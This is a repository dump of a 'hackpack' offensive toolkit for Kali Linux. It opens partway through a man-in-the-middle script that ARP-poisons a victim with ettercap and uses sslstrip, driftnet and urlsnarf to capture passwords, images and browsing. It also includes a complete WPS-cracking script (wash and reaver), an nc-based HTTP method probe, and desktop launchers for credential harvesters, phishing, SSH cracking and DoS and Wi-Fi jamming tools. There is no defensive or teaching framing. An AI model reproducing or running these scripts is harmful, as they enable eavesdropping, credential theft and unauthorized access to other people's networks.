239 | echo "1" > /proc/sys/net/ipv4/ip_forward
240 |
241 |
242 | #This will start driftnet to capture images on your computer
243 | sudo xterm -e driftnet -i $IFACE &
244 |
245 |
246 | #This will start URLSnarf to show the websites the victim browses
247 | sudo xterm -e urlsnarf -i $IFACE &
248 |
249 |
250 | #this command will set up all redirection
251 | sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
252 |
253 |
254 | #This command will start ettercap
255 | ettercap -Tq -i $IFACE -M arp:remote /$GATEWAY4/ /$HOST4/ &
256 |
257 |
258 | #This command will start SSLStrip to start sniffing https:// passwords
259 | sudo xterm -e sslstrip -a -l 8080 &
260 |
261 |
262 | echo "Press ENTER to stop session"
263 | read ENTERKEY
264 |
265 | killall sslstrip
266 | killall ettercap
267 | killall urlsnarf
268 | killall xterm
269 | echo "0" > /proc/sys/net/ipv4/ip_forward
270 | iptables --flush
271 | iptables --table nat --flush
272 | iptables --delete-chain
273 | iptables --table nat --delete-chain
274 |
275 | fi
276 | fi
277 | fi
278 | fi
279 |
280 |
--------------------------------------------------------------------------------
/hackpack/hackpack/webservmethod.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | for webservmethod in GET POST PUT TRACE CONNECT OPTIONS PROPFIND;
4 |
5 | do
6 | printf "$webservmethod " ;
7 | printf "$webservmethod / HTTP/1.1\nHost: $1\n\n" | nc -q 1 $1 80 | grep "HTTP/1.1"
8 |
9 | done
10 |
--------------------------------------------------------------------------------
/hackpack/hackpack/wpabust.sh:
--------------------------------------------------------------------------------
1 | #! /bin/bash
2 | #WpaBust is a reaver automation script for kali-linux
3 | #Authors: D4rk50ld13r & gh0std0g
4 |
5 | %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
6 |
7 | #CONFIG: Customize the script according to your needs
8 | #The default wireless interface (usually wlan0, wifi0 or ath0)
9 | wireless_interface=wlan0
10 |
11 | #The timeout (in seconds) for wash to search for WPS-enabled access points
12 | wash_timeout=15
13 |
14 | #Flag to allow user to choose target AP
15 | allow_user_choice=1
16 |
17 | #Delay between attack attempts
18 | reaver_delay=0
19 |
20 | #Check for root privileges
21 | if (( EUID != 0 )); then
22 | echo "This script needs root"
23 | exit 1
24 | fi
25 |
26 | #Check for required commands
27 | for command in airmon-ng wash reaver
28 | do
29 | if [[ -z $(which $command) ]]; then
30 | echo "$command was not found"
31 | echo "To install $command, you may follow this link"
32 | echo "http://lmgtfy.com/?q=$command+installation"
33 | exit 1
34 | fi
35 | done
36 |
37 | echo "WARNING: Network connections are about to go down. You may need to re-enable wireless connections manually"
38 |
39 | #Check available interfaces and close previous monitor interfaces and wireless lan
40 | for interface in $(ifconfig | tr -s [:space:] | cut -f1 -d" " | tr -s [:space:])
41 | do
42 | if [[ -n $(echo $interface | grep "^mon*") ]] || [[ -n $(echo $interface | grep '0$') ]] && [[ $(echo $interface) != "eth0" ]]; then
43 | echo "* Shutting down $interface"
44 | airmon-ng stop $interface > /dev/null
45 | fi
46 | done
47 |
48 | echo "* Starting a new monitor interface mon0"
49 | airmon-ng start $wireless_interface > /dev/null
50 |
51 | echo "Identifying WPS-enabled access points"
52 | timeout $wash_timeout wash -i mon0 --ignore-fcs > washOutput.txt
53 | APs=$(cat washOutput.txt | tail -n +3 | tr -s ' ' | cut -f6 -d' ')
54 |
55 | if [[ -n $(echo $APs) ]]; then
56 | if (( $allow_user_choice )); then
57 | n=1
58 | echo "The following access points were detected"
59 | for ap in $APs
60 | do
61 | echo "* $n: $ap"
62 | ((n++))
63 | done
64 | read -p "Enter your choice: " choice
65 | if [[ $choice -le $n ]]; then
66 | chosen_ap=$(echo "${APs}" | head -$choice | tail -1)
67 | echo "You have chosen $chosen_ap"
68 | else
69 | echo "Invalid choice!"
70 | exit 1
71 | fi
72 | else
73 | chosen_ap=$(echo "${APs}" | head -n1)
74 | echo "Proceeding with choice 1: $chosen_ap"
75 | fi
76 | tempLine=$(cat washOutput.txt | grep $chosen_ap | tr -s ' ')
77 | rm washOutput.txt
78 | channel=$(echo $tempLine | cut -f2 -d' ')
79 | mac_address=$(echo $tempLine | cut -f1 -d' ')
80 | echo "Starting reaver"
81 | echo "reaver -a -S -vv -c $channel -i mon0 -b $mac_address -d $reaver_delay"
82 | echo "AP name: $chosen_ap"
83 | echo "Channel: $channel"
84 | echo "MAC Address: $mac_address"
85 | reaver -a -S -vv -c $channel -i mon0 -b $mac_address -d $reaver_delay
86 | else
87 | echo "No networks found. Consider increasing the wash timeout. Terminating"
88 | exit 1
89 | fi
90 |
91 |
--------------------------------------------------------------------------------
/hackpack/install.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | ### Hackpack installer by reaperz73
3 | cp *.png /usr/share/icons
4 | cp *.menu /etc/xdg/menus/applications-merged
5 | cp *.directory /usr/share/desktop-directories
6 | cp -r hackpack /opt/
7 | rm -rf /usr/share/applications/hackpack
8 | mkdir /usr/share/applications/hackpack
9 | cd launchers
10 | cp *.desktop /usr/share/applications/hackpack
11 |
--------------------------------------------------------------------------------
/hackpack/launchers/911-AP.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=911-AP
4 | Type=Application
5 | Comment=911-AP by em3rgency
6 | Terminal=true
7 | Exec=sh -c "cd /opt/hackpack;./911_AP.sh;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=sniffspoof;wireless
10 | GenericName=911-AP
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/Ghost_Phisher.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Name=Ghost Phisher
3 | Version=1.0
4 | Exec=python /opt/Ghost-Phisher/ghost.py
5 | Comment=
6 | Icon=/opt/Ghost-Phisher/gui/images/icon.png
7 | Type=Application
8 | Terminal=false
9 | StartupNotify=true
10 | Encoding=UTF-8
11 | Categories=sniffspoof
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/Recon.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=Recon
4 | Type=Application
5 | Comment=Recon
6 | Terminal=true
7 | Exec=sh -c "cd /opt/hackpack;./Recon.sh;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=recon
10 | GenericName=Recon.sh
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/admincp.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=Admin CP Finder
4 | Type=Application
5 | Comment=Admin CP Finder
6 | Terminal=true
7 | Exec=sh -c "cd /opt/hackpack;perl admin.pl;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=recon
10 | GenericName=Admin CP Finder
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/apfucker.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=AP-Fucker
4 | Type=Application
5 | Comment=AP-Fucker by MatToufoutu
6 | Terminal=true
7 | Exec=sh -c "cd /opt/hackpack;./AP_fucker.py;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=wireless
10 | GenericName=AP-Fucker
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/autosploit.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=autosploit
4 | Type=Application
5 | Comment=autosploit
6 | Terminal=true
7 | Exec=sh -c "cd /opt/hackpack/SQL;perl autosploit.pl;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=database
10 | GenericName=autosploit
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/credhavester.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=Cred-Harvester
4 | Type=Application
5 | Comment=Cred-Harvester
6 | Terminal=true
7 | Exec=sh -c "cd /opt/hackpack;./40_Cred_Harvester_1.4.sh;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=sniffspoof
10 | GenericName=Cred-Harvester
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/easy-creds.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=Easy-Creds
4 | Type=Application
5 | Comment=Easy-Creds
6 | Terminal=true
7 | Exec=sh -c "easy-creds;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=sniffspoof
10 | GenericName=Easy-Creds
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/ejacoolas.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=ejacoolas
4 | Type=Application
5 | Comment=ejacoolas
6 | Terminal=true
7 | Exec=sh -c "cd /opt/hackpack;./ejacoolas.sh;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=scripts
10 | GenericName=ejacoolas.sh
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/enum.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=enum
4 | Type=Application
5 | Comment=enum
6 | Terminal=true
7 | Exec=sh -c "cd /opt/hackpack;./enum.sh;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=recon
10 | GenericName=enum
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/findhosts.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=Find Hosts
4 | Type=Application
5 | Comment=Find Hosts
6 | Terminal=true
7 | Exec=sh -c "/opt/hackpack/Find_Hosts.sh;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=recon
10 | GenericName=Find Hosts.sh
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/googli.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=Googli
4 | Type=Application
5 | Comment=Googli by xd00sry
6 | Terminal=true
7 | Exec=sh -c "cd /opt/hackpack;./googli.pl;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=scripts
10 | GenericName=Googli
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/ipchecker.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=ipchecker
4 | Type=Application
5 | Comment=ipchecker
6 | Terminal=true
7 | Exec=sh -c "cd /opt/hackpack;./ipchecker.sh;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=scripts
10 | GenericName=ipchecker.sh
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/lazykali.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=LazyKali
4 | Type=Application
5 | Comment=LazyKali
6 | Terminal=true
7 | Exec=lazykali
8 | Icon=elisa.png
9 | Categories=scripts
10 | GenericName=LazyKali
11 |
--------------------------------------------------------------------------------
/hackpack/launchers/lbd.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=Load Balacing Detector
4 | Type=Application
5 | Comment=Load Balacing Detector
6 | Terminal=true
7 | Exec=sh -c "cd /opt/hackpack;./lbd.sh;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=recon
10 | GenericName=Load Balacing Detector
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/lrdos.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=LRDoS
4 | Type=Application
5 | Comment=LRDoS by R4V3N747700
6 | Terminal=true
7 | Exec=sh -c "cd /opt/hackpack/ddos;./LRDoS.sh;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=dos
10 | GenericName=LRDoS.sh
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/macchanger.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=MACchanger
4 | Type=Application
5 | Comment=MACchanger by em3rgency
6 | Terminal=true
7 | Exec=sh -c "cd /opt/hackpack;./MACchanger.sh;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=wireless
10 | GenericName=MACchanger
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/n1tr0g3n_ssl.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=n1tr0g3n_SSL
4 | Type=Application
5 | Comment=n1tr0g3n_SSL by n1tr0g3n
6 | Terminal=true
7 | Exec=sh -c "cd /opt/hackpack;./n1tr0g3n_SSL_BT-5.sh;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=sniffspoof
10 | GenericName=n1tr0g3n_SSL
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/passivefingerprint.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=Passive Fingerprint
4 | Type=Application
5 | Comment=Passive Fingerprint
6 | Terminal=true
7 | Exec=sh -c "cd /opt/hackpack;./70_Passive_Fingerprint_1.2.sh;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=recon
10 | GenericName=Passive Fingerprint
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/pwnstar.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=PwnStar
4 | Type=Application
5 | Comment=PwnStar
6 | Terminal=true
7 | Exec=sh -c "cd /opt/PwnSTAR_0.9;./PwnSTAR_0.9;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=sniffspoof
10 | GenericName=PwnStar
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/readysethack.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=readysethack
4 | Type=Application
5 | Comment=readysethack by TH3CR4CK3R
6 | Terminal=true
7 | Exec=sh -c "cd /opt/hackpack;./readysethack.py;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=wireless
10 | GenericName=readysethack
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/recon-ng.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=Recon-ng
4 | Type=Application
5 | Comment=Recon-ng
6 | Terminal=true
7 | Exec=sh -c "cd /opt/recon-ng;./recon-ng.py;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=recon
10 | GenericName=Recon-ng
11 |
--------------------------------------------------------------------------------
/hackpack/launchers/slowloris.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=Slowloris
4 | Type=Application
5 | Comment=Slowloris
6 | Terminal=true
7 | Exec=sh -c "cd /opt/hackpack/ddos; echo type ./slowloris + options to use or perldoc slowloris.pl for help ;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=dos
10 | GenericName=Slowloris
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/smskiller.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=smskiller
4 | Type=Application
5 | Comment=smskiller
6 | Terminal=true
7 | Exec=sh -c "cd /opt/hackpack;./smskiller.sh;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=scripts
10 | GenericName=smskiller
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/soundcloud.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=soundcloud
4 | Type=Application
5 | Comment=soundcloud
6 | Terminal=true
7 | Exec=sh -c "cd /opt/hackpack;./soundcloud.sh;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=scripts
10 | GenericName=soundcloud
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/ssh_crack3r..desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=ssh_crack3r
4 | Type=Application
5 | Comment=ssh_crack3r by n1tr0g3n
6 | Terminal=true
7 | Exec=sh -c "cd /opt/hackpack;./ssh_crack3r.sh;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=scripts
10 | GenericName=ssh_crack3r
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/ssl_phucker.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=ssl_phucker
4 | Type=Application
5 | Comment=ssl_phucker by n1tr0g3n
6 | Terminal=true
7 | Exec=sh -c "cd /opt/hackpack;./ssl_phucker.sh;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=sniffspoof
10 | GenericName=ssl_phucker
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/subterfuge.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=Subterfuge
4 | Type=Application
5 | Comment=Subterfuge
6 | Terminal=true
7 | Exec=sh -c "subterfuge;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=sniffspoof
10 | GenericName=Subterfuge
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/webservmethod.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=webservmethod
4 | Type=Application
5 | Comment=webservmethod
6 | Terminal=true
7 | Exec=sh -c "cd /opt/hackpack;./webservmethod.sh;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=recon
10 | GenericName=webservmethod.sh
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/wifijammer.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=wifijammer
4 | Type=Application
5 | Comment=wifijammer
6 | Terminal=true
7 | Exec=sh -c "cd /opt/hackpack/ddos;./wifijammer_0.1.sh;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=dos;wireless
10 | GenericName=wifijammer
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/wlm.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=Wordlist Manipulator
4 | Type=Application
5 | Comment=Wordlist Manipulator
6 | Terminal=true
7 | Exec=sh -c "cd /opt/hackpack;./wlm;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=scripts
10 | GenericName=Wordlist Manipulator
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/wpabust.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=WpaBust
4 | Type=Application
5 | Comment=WpaBust by D4rk50ld13r & gh0std0g
6 | Terminal=true
7 | Exec=sh -c "cd /opt/hackpack;./wpabust.sh;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=wireless
10 | GenericName=WpaBust
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/yamas.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=Yamas
4 | Type=Application
5 | Comment=Yamas
6 | Terminal=true
7 | Exec=bash -c "yamas;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=sniffspoof
10 | GenericName=Yamas
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/lzdatabase.directory:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Name=Database
3 | Type=Directory
4 | Icon=bug.png
5 |
--------------------------------------------------------------------------------
/hackpack/lzdos.directory:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Name=DoS
3 | Type=Directory
4 | Icon=bug.png
5 |
--------------------------------------------------------------------------------
/hackpack/lzhackpack.directory:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Name=Hackpack
3 | Type=Directory
4 | Icon=bug.png
5 |
--------------------------------------------------------------------------------
/hackpack/lzhackscripts.directory:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Name=Scripts
3 | Type=Directory
4 | Icon=bug.png
5 |
--------------------------------------------------------------------------------
/hackpack/lzrecon.directory:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Name=Recon
3 | Type=Directory
4 | Icon=bug.png
5 |
--------------------------------------------------------------------------------
/hackpack/lzsniffspoof.directory:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Name=Sniffing/Spoofing
3 | Type=Directory
4 | Icon=bug.png
5 |
--------------------------------------------------------------------------------
/hackpack/lztools.directory:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Name=Tools
3 | Type=Directory
4 | Icon=bug.png
5 |
--------------------------------------------------------------------------------
/hackpack/lzwireless.directory:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Name=Wireless
3 | Type=Directory
4 | Icon=bug.png
5 |
--------------------------------------------------------------------------------
/hackpack/myhackpack.menu:
--------------------------------------------------------------------------------
1 |
3 |
4 |
80 |
81 |
82 |
83 |
84 |
--------------------------------------------------------------------------------